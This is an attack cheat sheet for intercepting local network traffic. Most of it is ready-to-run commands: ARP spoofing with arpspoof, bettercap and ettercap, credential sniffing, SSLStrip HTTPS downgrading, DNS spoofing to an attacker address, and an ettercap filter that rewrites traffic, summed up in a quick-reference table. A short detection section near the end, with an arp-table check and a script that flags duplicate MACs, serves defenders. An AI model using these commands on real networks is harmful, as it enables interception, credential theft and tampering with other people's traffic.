ARP Spoofing — arpspoof

Enable IP Forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

Spoof

arpspoof -i eth0 -t TARGET_IP GATEWAY_IP
arpspoof -i eth0 -t GATEWAY_IP TARGET_IP

Run both in separate terminals. Traffic flows: Target → Attacker → Gateway.

Bettercap

Install

apt install bettercap

Start

bettercap -iface eth0

ARP Spoof

» net.probe on
» set arp.spoof.targets TARGET_IP
» arp.spoof on
» net.sniff on

Capture Credentials

» set net.sniff.verbose true
» net.sniff on

HTTP Proxy (SSLStrip)

» set http.proxy.sslstrip true
» http.proxy on
» arp.spoof on
» net.sniff on

Caplet (Script)

# spoof.cap
set arp.spoof.targets TARGET_IP
arp.spoof on
net.sniff on

# Run the caplet
bettercap -iface eth0 -caplet spoof.cap

DNS Spoofing

» set dns.spoof.domains target.com
» set dns.spoof.address ATTACKER_IP
» dns.spoof on

Ettercap

GUI

ettercap -G

CLI — ARP Spoof

ettercap -T -q -i eth0 -M arp:remote /TARGET_IP// /GATEWAY_IP//

With Filter

ettercap -T -q -i eth0 -M arp:remote -F filter.ef /TARGET_IP// /GATEWAY_IP//

Compile Filter

etterfilter filter.ecf -o filter.ef

Filter Example (Replace Text)

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
    }
}

Without Tools — Manual ARP

echo 1 > /proc/sys/net/ipv4/ip_forward

# Send fake ARP replies
# Tell target: "I am the gateway"
# Tell gateway: "I am the target"

# Use scapy or arpspoof

Detection

# Check ARP table for duplicates
arp -a | sort

# Wireshark filter
arp.duplicate-address-detected
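
A scripted version of the duplicate check above, as an added example (not part of the original page): it reads a table in Linux /proc/net/arp format and reports any MAC address bound to more than one IP, and it compares the gateway entry against a MAC recorded while the network was known to be clean. The function names and the sample table are constructed for illustration.

```shell
#!/bin/sh
# Assumed input format: Linux /proc/net/arp
# (columns: IP address, HW type, Flags, HW address, Mask, Device).

# Constructed sample: the gateway 192.168.1.1 and host 192.168.1.50 share
# one MAC, which is how a poisoned cache looks from the victim side.
SAMPLE_ARP='IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:50     *        eth0
192.168.1.50     0x1         0x2         aa:bb:cc:dd:ee:50     *        eth0
192.168.1.77     0x1         0x2         aa:bb:cc:dd:ee:77     *        eth0
192.168.1.99     0x1         0x0         00:00:00:00:00:00     *        eth0'

# find_shared_macs: reads the table on stdin and prints one line per MAC
# that is bound to two or more IPs, as "<mac> <ip1>,<ip2>,...".
find_shared_macs() {
    awk '
        NR == 1 { next }                        # header row
        $4 == "00:00:00:00:00:00" { next }      # incomplete entries
        {
            mac = tolower($4)
            if (count[mac]++) ips[mac] = ips[mac] "," $1
            else ips[mac] = $1
        }
        END {
            for (mac in count)
                if (count[mac] > 1) print mac, ips[mac]
        }
    ' | sort
}

# gateway_mac_ok GATEWAY_IP EXPECTED_MAC: reads the table on stdin.
# Returns 0 only if the gateway has an entry and it matches the recorded
# MAC; returns 1 if the entry is missing or points at a different MAC.
gateway_mac_ok() {
    awk -v ip="$1" -v mac="$2" '
        NR > 1 && $1 == ip {
            seen = 1
            if (tolower($4) != tolower(mac)) bad = 1
        }
        END { exit (seen && !bad) ? 0 : 1 }
    '
}
```

On a live Linux host, feed the functions the kernel table directly, for example `find_shared_macs < /proc/net/arp`.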

Quick Reference

Task          Command
ARP spoof     arpspoof -i eth0 -t TARGET GATEWAY
Bettercap     bettercap -iface eth0, then » arp.spoof on
Ettercap      ettercap -T -M arp:remote /TARGET// /GW//
DNS spoof     Bettercap: dns.spoof on
IP forward    echo 1 > /proc/sys/net/ipv4/ip_forward